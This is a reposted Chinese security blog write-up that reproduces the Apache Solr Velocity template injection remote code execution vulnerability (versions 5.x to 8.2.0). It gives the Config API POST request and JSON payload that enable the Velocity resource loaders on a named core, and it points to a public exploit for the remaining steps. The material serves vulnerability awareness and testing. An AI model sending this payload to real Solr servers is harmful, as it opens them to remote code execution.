行业动态 | Apache Solr 远程命令执行漏洞复现

Posted 安全加

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了行业动态 | Apache Solr 远程命令执行漏洞复现相关的知识,希望对你有一定的参考价值。

0x00简介

Apache Solr是一个高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能的开源的搜索服务器。Solr为世界上许多最大的互联网站点提供搜索和导航功能。

0x01影响范围

漏洞名称:Apache Solr远程代码执行漏洞

威胁等级:高危

Apache Solr 5.x - 8.2.0,存在config API版本

0x02漏洞描述

该漏洞本质是ConfigAPI允许通过HTTP POST请求进行配置。

攻击者可以通过ConfigAPI对VelocityResponseWriter组件进行配置,将params.resource.loader.enabled设置为true。通过Velocity模板注入,实现远程代码执行漏洞的利用。

0x03漏洞复现

行业动态 | Apache Solr 远程命令执行漏洞复现

(1-1)

我们首先得知道Solr服务中Core的名称

如图1-1所示 即为Core名称

接着构造POST请求,在/solr/Core名称/config目录POST以下数据(修改Core的配置)

如我现在实战的名称 POST: /solr/group-buy-captain/config


打开Burpsuite抓POST包 填入:


{

 "update-queryresponsewriter": {    

"startup": "lazy",   

"name": "velocity",    

"class":

"solr.VelocityResponseWriter",    

"template.base.dir":"",    

"solr.resource.loader.enabled": "true",    

"params.resource.loader.enabled": "true"  

}

}

行业动态 | Apache Solr 远程命令执行漏洞复现

(1-2)

最后我们就可以使用已经公开的exp进行利用了

行业动态 | Apache Solr 远程命令执行漏洞复现
行业动态 | Apache Solr 远程命令执行漏洞复现

0x04修复建议

官方尚未发布相应补丁

行业动态 | Apache Solr 远程命令执行漏洞复现

作者语录

来蹭一波热度,给大佬们奉上卡布奇诺一杯

安全+ 

安全+ 专注于安全行业,通过互联网平台、线下沙龙、培训、峰会、人才招聘等多种形式,致力于创建亚太地区最好的甲乙双方交流、学习的平台,培养安全人才,提升行业整体素质,助推安全生态圈的健康发展。      

官⽅⽹站:www.anquanjia.net.cn


以上是关于行业动态 | Apache Solr 远程命令执行漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

Apache Solr 远程命令+XXE执行漏洞(CVE-2017-12629)

华盟大讲堂016Apache Solr远程命令执行漏洞分析

Apache Solr 远程命令执行漏洞(CVE-2019-0193)

通告更新Apache Solr模板注入远程代码执行漏洞安全风险通告

网警提醒关于Apache Solr Velocity模板远程代码执行漏洞的预警通报

Apache Solr JMX服务远程代码执行漏洞复现